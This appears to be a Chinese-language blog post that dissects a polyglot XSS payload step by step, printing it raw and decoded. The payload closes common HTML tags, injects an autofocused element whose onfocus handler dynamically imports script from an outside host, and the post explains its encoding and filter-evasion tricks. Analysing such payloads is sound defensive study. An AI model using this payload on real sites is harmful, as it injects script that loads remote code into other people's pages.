【XSS payload 】一个经典的XSS payload

zhengfei6112026-02-25 20:06

整体结构

原始Payload:

复制代码 
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

解码关键部分:

  • %250A → 换行符 \n

  • %26apos;'(HTML实体单引号)

  • \74 → 八进制 <

  • \76 → 八进制 >

解码后大致为:

复制代码 
JavaScript://\n/*?'/*\'/*"/*\"/*`/*\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript><k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https: X55.is/.source))}//>
-->
复制代码

注意末尾的 //>--> 是分离的。

各组成部分的作用

1. JavaScript伪协议 + 换行绕过注释

  • JavaScript:// 试图构造一个 javascript: URL(大小写不敏感),但多了一个斜杠,实际浏览器可能仍解析为伪协议。

  • %250A 解码为换行符,用于结束单行注释 //,使得后续代码变为可执行。

  • javascript: URL 中,浏览器先对URL解码,然后执行得到的JavaScript代码。解码后为 JavaScript://\n...,其中 // 注释掉空内容,换行后代码开始执行。

2. 多种引号和注释混淆
  • /*?'/*\'/*"/*\"/*/*`/*')/*<!--这部分包含各种引号(单、双、反引号)及转义版本,以及HTML实体,旨在绕过WAF对特定字符的过滤。同时夹杂/*<!--` 注释,可能试图干扰解析器。
3. 闭合常见HTML标签
  • </Title></Style></Script></textArea></iFrame></noScript> 试图关闭可能存在的父标签,使后续内容作为新的HTML插入,从而注入新元素。
4. 注入新标签及事件处理器

  • \74k<K 解码为 <k<K,可能是 <k<K 标签(不标准,但浏览器会尝试解析为标签名)。随后紧跟 /contentEditable/autoFocus/OnFocus=,这试图为标签设置属性:

    • contentEditable 使元素可编辑

    • autoFocus 使页面加载时自动获得焦点

    • OnFocus 定义焦点事件的处理函数

  • 属性值是一段JavaScript代码,其中包含多层注释和 import() 调用。

5. 事件处理函数中的JavaScript

OnFocus 的值:

复制代码 
/*${/*/;{/**/(import(/https: X55.is/.source))}//\76-->
复制代码

  • 经过注释解析后,实际执行的代码为:{ /**/ (import(/https: X55.is/.source)) }(前面的 /*...*/ 注释掉了 /*${/*/;,后面的 //> 注释掉剩余部分)。

  • import(/https: X55.is/.source)

    • /https: X55.is/ 是一个正则表达式字面量,.source 返回其字符串内容 "https: X55.is"

    • 因此 import() 试图动态加载模块 "https: X55.is",但该URL包含空格,实际无效。可能本意是加载 https://X55.is/,但写法有误。

  • 如果加载成功,该外部脚本可能包含 alert() 或其他恶意代码。

6. HTML注释闭合
  • 最后的 \76--> 解码为 >-->,可能试图闭合前面可能存在的 <!-- 注释,确保HTML结构完整。

攻击原理总结

该Payload尝试在多种上下文中执行:

  • 作为 javascript: URL :若放在 hrefsrc 中,点击或加载时会执行解码后的代码,触发动态导入。

  • 作为HTML注入 :若插入到页面中,它会闭合已有标签,创建新元素(如 <k>)并设置 onfocus 事件,当元素获得焦点(如通过 autofocus)时执行事件中的 import()

  • 动态导入:尝试加载外部脚本,若成功则可能弹出弹窗。

由于语法错误(import 参数格式不对),该Payload可能无法直接执行,但反映了攻击者常用的混淆技术,包括:

  • URL编码绕过

  • 注释嵌套和换行

  • 多种引号组合

  • 标签闭合和事件注入

  • ES6动态导入

注意 :实际测试时,import() 需要正确的模块URL,且受CORS限制,因此该Payload可能仅用于演示或绕过WAF的测试。

相关推荐
全栈老石3 小时前
手写一个无限画布 #1:坐标系的谎言
前端·canvas
XW01059993 小时前
4-11判断素数
前端·python·算法·素数
J2虾虾3 小时前
Spring Boot中使用@Scheduled做定时任务
java·前端·spring boot
Heo3 小时前
深入React19任务调度器Scheduler
前端·javascript·面试
一枚前端小姐姐3 小时前
Vue3 + Pinia 状态管理,从入门到模块化
前端·vue.js
用户14436183400973 小时前
你不知道的JS上-(九)
前端·javascript
yuki_uix3 小时前
为什么我的 Auth Token 藏在了 Network 面板的 Doc 里?
前端·python·debug
不会敲代码13 小时前
从原子CSS到TailwindCSS:现代前端样式解决方案全解析
前端·css·react.js
Wect3 小时前
LeetCode 102. 二叉树的层序遍历:图文拆解+代码详解
前端·算法·typescript
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆05Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤06OpenClaw 使用和管理 MCP 完全指南07AI agent:介绍 ZeroClaw 安装,使用08OpenClaw 安装之(三)DeepSeek模型接入配置和详细配置参数09AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南10让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南